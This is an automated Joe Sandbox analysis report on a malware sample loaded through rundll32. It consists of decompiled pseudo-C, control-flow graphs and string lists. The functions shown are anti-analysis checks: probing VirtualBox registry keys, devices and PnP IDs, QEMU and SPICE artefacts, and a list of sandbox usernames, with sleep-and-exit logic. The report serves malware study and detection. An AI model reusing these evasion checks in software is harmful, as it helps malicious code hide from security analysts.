21ef301fb3e-21ef301fb42 VariantClear 347->349 350 21ef301fb27-21ef301fb3a call 21ef310e5b0 347->350 349->345 350->349 352->353 355 21ef301fb78-21ef301fb7a 352->355 360 21ef301fbf2-21ef301fbfe 353->360 361 21ef301fbc3-21ef301fbcb 353->361 356 21ef301fb93-21ef301fb97 VariantClear 355->356 357 21ef301fb7c-21ef301fb8f call 21ef310e5b0 355->357 356->353 357->356 360->339 368 21ef301fc00-21ef301fc07 360->368 361->360 362 21ef301fbcd-21ef301fbcf 361->362 364 21ef301fbd1-21ef301fbe4 call 21ef310e5b0 362->364 365 21ef301fbe8-21ef301fbec VariantClear 362->365 364->365 365->360 368->334 370 21ef301fc0d 368->370 370->332
                                        C-Code - Quality: 21%
                                        			E0000021E21EF301F9C0(void* __edx, void* __rax, long long __rdi, long long __rsi, long long __r12, long long __r14, char _a8, void* _a16, void* _a24, void* _a32) {
				long long _v32;
				long long _v40;
				long long _v48;
				long long _v56;
				intOrPtr _v72;
				signed int _v80;
				void* _v88;
				long long _v96;
				long long _v104;
				void* __rbx;
				void* _t71;
				void* _t72;
				signed char _t78;
				signed char _t81;
				signed char _t84;
				void* _t94;
				void* _t128;
				intOrPtr* _t137;
				long long _t167;
				void* _t180;
				long long _t185;

				_t167 = __rsi;
				r15d = 0;
				_a32 = _t185;
				_v88 = _t185;
				_a24 = _t185;
				_t72 = E0000021E21EF30211C0(_t71,  &_a32,  &_v88, __rsi); // executed
				if (_t72 == 0) goto 0xf301fc43;
				_v32 = _t167;
				_v40 = __rdi;
				_v48 = __r12;
				_v56 = __r14;
				__imp__#2();
				__imp__#2();
				r12d = 1;
				r14d = r12d;
				if (__rax == 0) goto 0xf301fa8a;
				if (__rax == 0) goto 0xf301fa81;
				_v96 =  &_a24;
				_t13 = _t185 + 0x30; // 0x30
				r9d = _t13;
				_v104 = _t185;
				_t179 =  *_a32;
				if ( *((intOrPtr*)( *_a32 + 0xa0))() >= 0) goto 0xf301fa81;
				r14d = r15d;
				 *((intOrPtr*)( *_a32 + 0x10))();
				 *((intOrPtr*)( *_v88 + 0x10))();
				__imp__CoUninitialize();
				__imp__#6();
				if (__rax == 0) goto 0xf301fa9d;
				__imp__#6();
				if (r14d == 0) goto 0xf301fc33;
				_t137 = _a24;
				_a16 = _t185;
				_a8 = r15d;
				if (_t137 == 0) goto 0xf301fc13;
				asm("o16 nop [eax+eax]");
				_v104 =  &_a8;
				r8d = r12d; // executed
				 *((intOrPtr*)( *_t137 + 0x20))();
				if (_a8 == r15d) goto 0xf301fc0f;
				_v96 = _t185;
				r8d = 0;
				_v104 = _t185;
				if ( *((intOrPtr*)( *_a16 + 0x20))() < 0) goto 0xf301fb48;
				_t78 = _v80 & 0x0000ffff;
				if (_t78 == r12w) goto 0xf301fb48;
				if ((_t78 & 0x00000008) == 0) goto 0xf301fb3e;
				E0000021E21EF310E5B0(_t128, _v72, L"VBOX", _v32,  *_a32, _t180);
				_t92 =  !=  ? r12d : r15d;
				__imp__#9();
				_v96 = _t185;
				r8d = 0;
				_v104 = _t185;
				if ( *((intOrPtr*)( *_a16 + 0x20))() < 0) goto 0xf301fb9d;
				_t81 = _v80 & 0x0000ffff;
				if (_t81 == r12w) goto 0xf301fb9d;
				if ((_t81 & 0x00000008) == 0) goto 0xf301fb93;
				E0000021E21EF310E5B0(_t128, _v72, L"VBOX", _v32,  *_a32, _t180);
				_t93 =  !=  ? r12d :  !=  ? r12d : r15d;
				__imp__#9();
				_v96 = _t185;
				r8d = 0;
				_v104 = _t185;
				if ( *((intOrPtr*)( *_a16 + 0x20))() < 0) goto 0xf301fbf2;
				_t84 = _v80 & 0x0000ffff;
				if (_t84 == r12w) goto 0xf301fbf2;
				if ((_t84 & 0x00000008) == 0) goto 0xf301fbe8;
				E0000021E21EF310E5B0(_t128, _v72, L"VEN_VBOX", _v32, _t179, _t180);
				_t94 =  !=  ? r12d :  !=  ? r12d :  !=  ? r12d : r15d;
				__imp__#9();
				 *((intOrPtr*)( *_a16 + 0x10))();
				if (_t94 != 0) goto 0xf301fc0f;
				if (_a24 != 0) goto 0xf301fad0;
				goto 0xf301fc13;
				 *((intOrPtr*)( *_a24 + 0x10))();
				 *((intOrPtr*)( *_a32 + 0x10))();
				 *((intOrPtr*)( *_v88 + 0x10))();
				__imp__CoUninitialize(); // executed
				return _t94;
			}
























                                        0x21ef301f9c0
                                        0x21ef301f9cc
                                        0x21ef301f9d7
                                        0x21ef301f9db
                                        0x21ef301f9e2
                                        0x21ef301f9e6
                                        0x21ef301f9ed
                                        0x21ef301f9f3
                                        0x21ef301f9ff
                                        0x21ef301fa04
                                        0x21ef301fa09
                                        0x21ef301fa0e
                                        0x21ef301fa1e
                                        0x21ef301fa24
                                        0x21ef301fa2d
                                        0x21ef301fa33
                                        0x21ef301fa38
                                        0x21ef301fa42
                                        0x21ef301fa47
                                        0x21ef301fa47
                                        0x21ef301fa4e
                                        0x21ef301fa56
                                        0x21ef301fa62
                                        0x21ef301fa68
                                        0x21ef301fa6e
                                        0x21ef301fa78
                                        0x21ef301fa7b
                                        0x21ef301fa84
                                        0x21ef301fa92
                                        0x21ef301fa97
                                        0x21ef301faaa
                                        0x21ef301fab0
                                        0x21ef301fab4
                                        0x21ef301fab8
                                        0x21ef301fabf
                                        0x21ef301fac5
                                        0x21ef301fad7
                                        0x21ef301fae3
                                        0x21ef301fae6
                                        0x21ef301faed
                                        0x21ef301fafb
                                        0x21ef301fb07
                                        0x21ef301fb0a
                                        0x21ef301fb17
                                        0x21ef301fb19
                                        0x21ef301fb21
                                        0x21ef301fb25
                                        0x21ef301fb32
                                        0x21ef301fb3a
                                        0x21ef301fb42
                                        0x21ef301fb50
                                        0x21ef301fb5c
                                        0x21ef301fb5f
                                        0x21ef301fb6c
                                        0x21ef301fb6e
                                        0x21ef301fb76
                                        0x21ef301fb7a
                                        0x21ef301fb87
                                        0x21ef301fb8f
                                        0x21ef301fb97
                                        0x21ef301fba5
                                        0x21ef301fbb1
                                        0x21ef301fbb4
                                        0x21ef301fbc1
                                        0x21ef301fbc3
                                        0x21ef301fbcb
                                        0x21ef301fbcf
                                        0x21ef301fbdc
                                        0x21ef301fbe4
                                        0x21ef301fbec
                                        0x21ef301fbf9
                                        0x21ef301fbfe
                                        0x21ef301fc07
                                        0x21ef301fc0d
                                        0x21ef301fc16
                                        0x21ef301fc20
                                        0x21ef301fc2a
                                        0x21ef301fc2d
                                        0x21ef301fc42

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: String$ClearVariantwcsstr$AllocFreeUninitialize$Initialize
                                        • String ID: Caption$Name$PNPDeviceID$SELECT * FROM Win32_PnPDevice$VBOX$VEN_VBOX$WQL
                                        • API String ID: 2434920835-607120894
                                        • Opcode ID: cc10c454dd6f36fa67e0efdb553e1708b2252111ce35cecdcd5a4126dbaff4f9
                                        • Instruction ID: a441cdd534e73a8916fc5441327be697259acdb577ee0dddd6b83dbac4588116
                                        • Opcode Fuzzy Hash: cc10c454dd6f36fa67e0efdb553e1708b2252111ce35cecdcd5a4126dbaff4f9
                                        • Instruction Fuzzy Hash: 6D811476300B5186EF10EF25E89869E27B0FB98B98F465516EE4A43E68DF38C486C300
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF3020770 Relevance: 33.3, APIs: 1, Strings: 18, Instructions: 89COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: NameUser
                                        • String ID: Checking if username matches : %s $CurrentUser$Emily$HAPUBWS$Hong Lee$IT-ADMIN$John Doe$Johnson$Miller$Peter Wilson$Sandbox$maltest$malware$milozs$sand box$test user$timmy$virus
                                        • API String ID: 2645101109-2358638013
                                        • Opcode ID: f2deb0c914bb9bdb1558aab4743327aa1cd36bb3b5ebdf950a90f1c8705d3a96
                                        • Instruction ID: 7cf379e721366eecf48ff00925ef21e6bd9d8d183d9261603ddbca9f4e9d97d7
                                        • Opcode Fuzzy Hash: f2deb0c914bb9bdb1558aab4743327aa1cd36bb3b5ebdf950a90f1c8705d3a96
                                        • Instruction Fuzzy Hash: C9419335205B8495EA619B01EC883DB73F8F7A8B80F520226DE8C07B65EF7CC956CB44
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF301E2E0 Relevance: 21.1, APIs: 2, Strings: 10, Instructions: 65registryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        C-Code - Quality: 16%
                                        			E0000021E21EF301E2E0(long long __rbx, long long __rsi, long long _a8, long long _a16) {
				void* _v8;
				signed long long _v24;
				char _v536;
				long long _v552;
				long long _v560;
				long long _v568;
				long long _v576;
				long long _v584;
				long long _v592;
				long long _v600;
				long long _v608;
				long long _v616;
				char _v632;
				long long _v648;
				void* __rdi;
				long _t27;
				void* _t32;
				void* _t35;
				void* _t37;
				signed long long _t41;
				void* _t62;
				void* _t64;
				void* _t68;
				void* _t71;

				_a8 = __rbx;
				_a16 = __rsi;
				_t41 =  *0xf3203000; // 0x1fc8e4a4378e
				_v24 = _t41 ^ _t68 - 0x000002a0;
				_v616 = L"HARDWARE\\ACPI\\DSDT\\VBOX__";
				_v608 = L"HARDWARE\\ACPI\\FADT\\VBOX__";
				_v600 = L"HARDWARE\\ACPI\\RSDT\\VBOX__";
				_v592 = L"SOFTWARE\\Oracle\\VirtualBox Guest Additions";
				_v584 = L"SYSTEM\\ControlSet001\\Services\\VBoxGuest";
				_v576 = L"SYSTEM\\ControlSet001\\Services\\VBoxMouse";
				_v568 = L"SYSTEM\\ControlSet001\\Services\\VBoxService";
				_v560 = L"SYSTEM\\ControlSet001\\Services\\VBoxSF";
				_v552 = L"SYSTEM\\ControlSet001\\Services\\VBoxVideo";
				asm("o16 nop [eax+eax]");
				r8d = 0x200;
				E0000021E21EF310E410(_t32, 0, _t35, _t37,  &_v536, _t62, _t64, _t71);
				0xf301e130();
				_v632 = __rsi;
				r9d = 0x20019;
				_v648 =  &_v632;
				r8d = 0;
				_t27 = RegOpenKeyExW(??, ??, ??, ??, ??); // executed
				if (_t27 == 0) goto 0xf301e3ef;
				if (__rbx + 1 - 9 < 0) goto 0xf301e380;
				goto 0xf301e3ff;
				RegCloseKey(??);
				E0000021E21EF310C290();
				return 1;
			}



























                                        0x21ef301e2e0
                                        0x21ef301e2e5
                                        0x21ef301e2f2
                                        0x21ef301e2fc
                                        0x21ef301e30d
                                        0x21ef301e31b
                                        0x21ef301e327
                                        0x21ef301e333
                                        0x21ef301e33f
                                        0x21ef301e34b
                                        0x21ef301e357
                                        0x21ef301e363
                                        0x21ef301e36f
                                        0x21ef301e377
                                        0x21ef301e38a
                                        0x21ef301e390
                                        0x21ef301e3b1
                                        0x21ef301e3bb
                                        0x21ef301e3c0
                                        0x21ef301e3c6
                                        0x21ef301e3cb
                                        0x21ef301e3d8
                                        0x21ef301e3e0
                                        0x21ef301e3e9
                                        0x21ef301e3ed
                                        0x21ef301e3f4
                                        0x21ef301e40a
                                        0x21ef301e423

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseOpen
                                        • String ID: Checking reg key %s $HARDWARE\ACPI\DSDT\VBOX__$HARDWARE\ACPI\FADT\VBOX__$HARDWARE\ACPI\RSDT\VBOX__$SOFTWARE\Oracle\VirtualBox Guest Additions$SYSTEM\ControlSet001\Services\VBoxGuest$SYSTEM\ControlSet001\Services\VBoxMouse$SYSTEM\ControlSet001\Services\VBoxSF$SYSTEM\ControlSet001\Services\VBoxService$SYSTEM\ControlSet001\Services\VBoxVideo
                                        • API String ID: 47109696-1723177289
                                        • Opcode ID: 7c38387bba371d1f9531227918788e45451f020520461cd3ce23ee421c54f2a7
                                        • Instruction ID: 029cc993edfe70be0231e7c2baca091a9717d0cb67243f2e2e02279cfb177771
                                        • Opcode Fuzzy Hash: 7c38387bba371d1f9531227918788e45451f020520461cd3ce23ee421c54f2a7
                                        • Instruction Fuzzy Hash: EB31E536214B8095EA109B11F8883CBB3F8FB98780F525226EE9D43B69DF3CC156CB40
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF2FE9070 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 140sleepsynchronizationCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 706 21ef2fe9070 707 21ef2fe9070 call 21ef3111c60 706->707 708 21ef2fe9075-21ef2fe90aa Sleep SleepEx 707->708 708->706 709 21ef2fe90ac-21ef2fe9122 ExitProcess 708->709 710 21ef2fe912d-21ef2fe9135 709->710 711 21ef2fe9124-21ef2fe9127 WaitForSingleObject 709->711 712 21ef2fe9137-21ef2fe914c call 21ef2fe6530 710->712 713 21ef2fe9151 call 21ef301dc50 710->713 711->710 712->713 716 21ef2fe9156-21ef2fe916d call 21ef3111f70 call 21ef3111c8c 713->716 721 21ef2fe9172-21ef2fe9191 call 21ef3111df0 716->721 723 21ef2fe9196-21ef2fe91cb 721->723 724 21ef2fe91cd-21ef2fe91d0 723->724 725 21ef2fe91d2 723->725 726 21ef2fe91e0-21ef2fe9213 call 21ef2fe6400 724->726 727 21ef2fe91d6-21ef2fe91de 725->727 730 21ef2fe921a-21ef2fe921e 726->730 731 21ef2fe9215-21ef2fe9218 726->731 727->726 727->727 732 21ef2fe9220-21ef2fe9228 730->732 733 21ef2fe922a-21ef2fe922e call 21ef2fe6400 731->733 732->732 732->733 735 21ef2fe9233-21ef2fe9295 CoInitializeEx CoInitializeSecurity call 21ef301b3f0 733->735 737 21ef2fe929a-21ef2fe92b8 CreateEventW 735->737 738 21ef2fe92ba-21ef2fe92f3 CloseHandle CoUninitialize ExitProcess 737->738 739 21ef2fe92c4-21ef2fe92cf call 21ef31443c8 737->739 742 21ef2fe92f4-21ef2fe95e9 call 21ef301cdd0 call 21ef301cad0 call 21ef2fe8b00 call 21ef2fe15c0 * 2 call 21ef2fe1610 call 21ef2fe3600 call 21ef2fe1440 call 21ef2feb0a0 * 2 call 21ef301cf50 call 21ef301cc50 call 21ef2fe6530 call 21ef2fe6310 738->742 739->742 776 21ef2fe95f0-21ef2fe95f8 742->776 776->776 777 21ef2fe95fa-21ef2fe963a call 21ef2fe6400 776->777 781 21ef2fe9640-21ef2fe9648 777->781 781->781 782 21ef2fe964a-21ef2fe973e call 21ef2fe6400 call 21ef2fe6a70 781->782 789 21ef2fe9742-21ef2fe975d 782->789 790 21ef2fea81c-21ef2fea848 call 21ef3111c60 Sleep 789->790 791 21ef2fe9763-21ef2fe9813 call 21ef2ff5850 call 21ef3014e20 call 21ef2ff5cd0 789->791 790->789 802 21ef2fe98e9 call 21ef310ba8c 791->802 803 21ef2fe9903-21ef2fe9b68 call 21ef2febb60 791->803 807 21ef2fe98ee-21ef2fe98fe 802->807 812 21ef2fea70b-21ef2fea742 call 21ef3111c60 Sleep 803->812 813 21ef2fe9b6e-21ef2fea159 call 21ef2feb470 * 2 803->813 807->789 818 21ef2fea74a-21ef2fea777 call 21ef3111fb0 call 21ef310bdc8 812->818 819 21ef2fea744-21ef2fea749 call 21ef2feb260 812->819 813->812 830 21ef2fea15f-21ef2fea554 call 21ef2fe5d10 813->830 831 21ef2fea7bb-21ef2fea7d4 818->831 832 21ef2fea779-21ef2fea784 818->832 819->818 830->812 896 21ef2feaab5-21ef2fead81 call 21ef2fe6530 call 21ef2fe6400 call 21ef31443b0 call 21ef2fe9020 call 21ef2feb660 call 21ef2fe82c0 call 21ef2fe8170 call 21ef2fe82c0 call 21ef2fe8170 * 2 call 21ef2feaf10 call 21ef3014e20 call 21ef2ff5cd0 call 21ef301c460 830->896 831->807 837 21ef2fea7da-21ef2fea7e4 831->837 834 21ef2fea7b6 call 21ef310ba8c 832->834 835 21ef2fea786-21ef2fea789 832->835 834->831 838 21ef2feada7-21ef2feadac call 21ef3111be8 835->838 839 21ef2fea78f-21ef2fea796 835->839 837->802 842 21ef2fea7ea-21ef2fea7ed 837->842 857 21ef2feadad-21ef2feadb2 call 21ef3111be8 838->857 843 21ef2fea79c-21ef2fea7a3 839->843 844 21ef2feada1-21ef2feada6 call 21ef3111be8 839->844 846 21ef2fea7f3-21ef2fea7fa 842->846 847 21ef2feadbf-21ef2feae01 call 21ef3111be8 call 21ef2fe6100 * 2 842->847 849 21ef2fead9b-21ef2feada0 call 21ef3111be8 843->849 850 21ef2fea7a9-21ef2fea7ad 843->850 844->838 854 21ef2feadb9-21ef2feadbe call 21ef3111be8 846->854 855 21ef2fea800-21ef2fea807 846->855 885 21ef2feae02 847->885 849->844 858 21ef2fead95-21ef2fead9a call 21ef3111be8 850->858 859 21ef2fea7b3 850->859 854->847 865 21ef2fea80d-21ef2fea811 855->865 866 21ef2feadb3-21ef2feadb8 call 21ef3111be8 855->866 857->866 858->849 859->834 865->857 874 21ef2fea817 865->874 866->854 874->790 885->885 896->858
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Sleep$ExitObjectProcessSingleWait
                                        • String ID: 2104a$3C29FEA2-6FE8-4BF9-B98A-0E3442115F67$BLACK
                                        • API String ID: 620895886-100088877
                                        • Opcode ID: 4badb25b91996f65932bde4e98b74c20f78af2561106a00aecaef2fa4cda9d9d
                                        • Instruction ID: ae0bcf5a96273c358fb9f4e91104211b96a74eb2602acd96bd67f4ae974edf54
                                        • Opcode Fuzzy Hash: 4badb25b91996f65932bde4e98b74c20f78af2561106a00aecaef2fa4cda9d9d
                                        • Instruction Fuzzy Hash: 58516B72110BC18AFB759B34EC587DA37A5E3A1B28F4217189E6606EDACF38C196C350
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF30211C0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 94comCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Initialize$CreateInstanceSecurityUninitialize
                                        • String ID: ROOT\CIMV2
                                        • API String ID: 374467530-2786109267
                                        • Opcode ID: cde58bd1f11807151f71f409ee3618f128b570f62afd7fce95148d0cbc5f49ce
                                        • Instruction ID: 7b7c8f113c25092d6e39534f24f5d097409b0521688b267e919a9972aaa31305
                                        • Opcode Fuzzy Hash: cde58bd1f11807151f71f409ee3618f128b570f62afd7fce95148d0cbc5f49ce
                                        • Instruction Fuzzy Hash: 3C412B32608A8086EB648F25F85879F77B1F799B94F464115EE8A83F58DF3CC166CB00
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF301FE00 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 104COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 34%
                                        			E0000021E21EF301FE00(long long __rbx, long long __rsi, long long __rbp, void* __r9, long long _a8, long long _a16, long long _a24) {
				void* _v8;
				signed long long _v24;
				char _v536;
				void* _v1064;
				char _v1592;
				long long _v1608;
				long long _v1616;
				intOrPtr _v1624;
				void* __rdi;
				signed char _t29;
				void* _t31;
				void* _t38;
				void* _t41;
				signed long long _t48;
				void* _t63;
				void* _t68;
				void* _t75;
				void* _t78;
				void* _t81;

				_t81 = __r9;
				_a16 = __rbp;
				_a24 = __rsi;
				_t48 =  *0xf3203000; // 0x1fc8e4a4378e
				_v24 = _t48 ^ _t75 - 0x00000670;
				r8d = 0x208;
				E0000021E21EF310E410(_t31, 0, _t38, _t41,  &_v1592, _t63, _t68, _t78);
				_a8 = __rbx;
				_v1616 = L"qemu-ga";
				_v1608 = L"SPICE Guest Tools";
				asm("o16 nop [eax+eax]");
				r8d = 0x200;
				E0000021E21EF310E410(_t31, 0, 0, _t41,  &_v536, _t63, _t68, _t78);
				_v1624 = 0;
				if ( *0xf3204490 == 8) goto 0xf301ff49;
				if (1 - 0x1e < 0) goto 0xf301fe91;
				r9d = 0;
				_t11 = _t81 + 0x26; // 0x26
				r8d = _t11;
				__imp__SHGetSpecialFolderPathW();
				__imp__PathCombineW();
				0xf301e130();
				_t29 = GetFileAttributesW(??); // executed
				if (_t29 == 0xffffffff) goto 0xf301ff0d;
				if ((_t29 & 0x00000010) != 0) goto 0xf301ffc8;
				if (_t68 + 1 - 2 < 0) goto 0xf301fe70;
				E0000021E21EF310C290();
				return 0;
			}






















                                        0x21ef301fe00
                                        0x21ef301fe00
                                        0x21ef301fe05
                                        0x21ef301fe12
                                        0x21ef301fe1c
                                        0x21ef301fe2b
                                        0x21ef301fe31
                                        0x21ef301fe3d
                                        0x21ef301fe45
                                        0x21ef301fe5a
                                        0x21ef301fe65
                                        0x21ef301fe7a
                                        0x21ef301fe80
                                        0x21ef301fe87
                                        0x21ef301fe94
                                        0x21ef301fea6
                                        0x21ef301fea8
                                        0x21ef301feb5
                                        0x21ef301feb5
                                        0x21ef301feb9
                                        0x21ef301fed1
                                        0x21ef301fef0
                                        0x21ef301fefa
                                        0x21ef301ff03
                                        0x21ef301ff07
                                        0x21ef301ff14
                                        0x21ef301ff2f
                                        0x21ef301ff48

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Path$AttributesCombineCurrentEnvironmentExpandFileFolderProcessSpecialStrings
                                        • String ID: %ProgramW6432%$Checking QEMU directory %s $SPICE Guest Tools$qemu-ga
                                        • API String ID: 3908115579-2146621234
                                        • Opcode ID: cddd45ac548655ee25877be52d59947d54e96f6af9043e306f26cc9488fc13fa
                                        • Instruction ID: 243ffb10d2dfbcb97c757bae255810ecf6173cdf54a2618ecc581799174923bd
                                        • Opcode Fuzzy Hash: cddd45ac548655ee25877be52d59947d54e96f6af9043e306f26cc9488fc13fa
                                        • Instruction Fuzzy Hash: 0F416072214A9485EF209B15E8483DF73A1F7AAB84F864226DE8D43F6ADF3CC546C740
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF3020FD0 Relevance: 15.1, APIs: 10, Instructions: 74memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$Process$AdaptersAllocFreeInfo
                                        • String ID:
                                        • API String ID: 2824440793-0
                                        • Opcode ID: cb8fe06dabd72fa1b03e3663e6c92b7a4a3ca4949d70821c1c2e72601d651c16
                                        • Instruction ID: 4463531fb8a73e8400e33d0b787b5f3b59a8ce712a58477139cc79262364f25e
                                        • Opcode Fuzzy Hash: cb8fe06dabd72fa1b03e3663e6c92b7a4a3ca4949d70821c1c2e72601d651c16
                                        • Instruction Fuzzy Hash: 7E31873160978082EE648B57F8582AB67F1E79EB90F0A8035DF4A43B59DE7CC496C740
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF301E7D0 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 60fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseCreateFileHandle
                                        • String ID: Checking device %s $\\.\VBoxGuest$\\.\VBoxMiniRdrDN$\\.\VBoxTrayIPC$\\.\pipe\VBoxMiniRdDN$\\.\pipe\VBoxTrayIPC
                                        • API String ID: 3498533004-4225997269
                                        • Opcode ID: 56ed62d2cf7a837129290d8eac05861c9cde84ab61e432c1682e0b6220b0c953
                                        • Instruction ID: b7d3d63b7a330878c37d192bd1e85ac0f3ab51257fad299c545a3fc9c833c8c4
                                        • Opcode Fuzzy Hash: 56ed62d2cf7a837129290d8eac05861c9cde84ab61e432c1682e0b6220b0c953
                                        • Instruction Fuzzy Hash: 97211835208B8486EB509B11F8483CB73A4F798BA4F564226DE9C43BA9DF7CC54ACB40
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF30210E0 Relevance: 12.1, APIs: 8, Instructions: 57processCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Process32$CloseHandleNext$CreateFirstSnapshotToolhelp32
                                        • String ID:
                                        • API String ID: 3656348920-0
                                        • Opcode ID: 9c1d27ace35d54a340b9e4870039b04d238f8d5043f3ec788ee57e3bdf85d9d7
                                        • Instruction ID: bbf8c0dfc261c12dddde02022c30400fe6679199a8068c7ec10cad66930c4e5f
                                        • Opcode Fuzzy Hash: 9c1d27ace35d54a340b9e4870039b04d238f8d5043f3ec788ee57e3bdf85d9d7
                                        • Instruction Fuzzy Hash: D221F13120464082EF64CB25FD5C7AB63F1FB99BD4F4686219D6986AA8EF3CC516C700
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF301FC50 Relevance: 7.6, Strings: 6, Instructions: 51COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 68%
                                        			E0000021E21EF301FC50(long long __rbx, long long __rsi, long long _a8, long long _a16) {
				void* _v8;
				signed long long _v24;
				char _v536;
				long long _v544;
				long long _v552;
				long long _v560;
				long long _v568;
				long long _v576;
				char _v584;
				void* __rdi;
				void* _t20;
				void* _t23;
				void* _t26;
				void* _t27;
				signed long long _t31;
				long long _t40;
				void* _t45;
				void* _t47;
				void* _t52;
				void* _t55;

				_a8 = __rbx;
				_a16 = __rsi;
				_t31 =  *0xf3203000; // 0x1fc8e4a4378e
				_v24 = _t31 ^ _t52 - 0x00000260;
				_v584 = L"HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 0\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0";
				_t40 = L"QEMU";
				_v568 = _t40;
				_v576 = L"Identifier";
				_t49 =  &_v584;
				_v544 = _t40;
				_v560 = L"HARDWARE\\Description\\System";
				_v552 = L"SystemBiosVersion";
				r8d = 0x200;
				E0000021E21EF310E410(_t23, 0, _t26, _t27,  &_v536, _t45, _t47, _t55);
				0xf301e130();
				_t20 = E0000021E21EF3020EE0(_v584,  *((intOrPtr*)( &_v584 + 8)),  *((intOrPtr*)(_t49 + 0x10))); // executed
				if (_t20 != 0) goto 0xf301fd0e;
				if (__rbx + 1 - 2 < 0) goto 0xf301fcc0;
				goto 0xf301fd13;
				E0000021E21EF310C290();
				return 1;
			}























                                        0x21ef301fc50
                                        0x21ef301fc55
                                        0x21ef301fc62
                                        0x21ef301fc6c
                                        0x21ef301fc7d
                                        0x21ef301fc82
                                        0x21ef301fc90
                                        0x21ef301fc95
                                        0x21ef301fc9a
                                        0x21ef301fca6
                                        0x21ef301fcab
                                        0x21ef301fcb7
                                        0x21ef301fcc7
                                        0x21ef301fccd
                                        0x21ef301fce6
                                        0x21ef301fcf6
                                        0x21ef301fcfd
                                        0x21ef301fd0a
                                        0x21ef301fd0c
                                        0x21ef301fd1e
                                        0x21ef301fd37

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseOpenQueryValue
                                        • String ID: Checking reg key %s $HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0$HARDWARE\Description\System$Identifier$QEMU$SystemBiosVersion
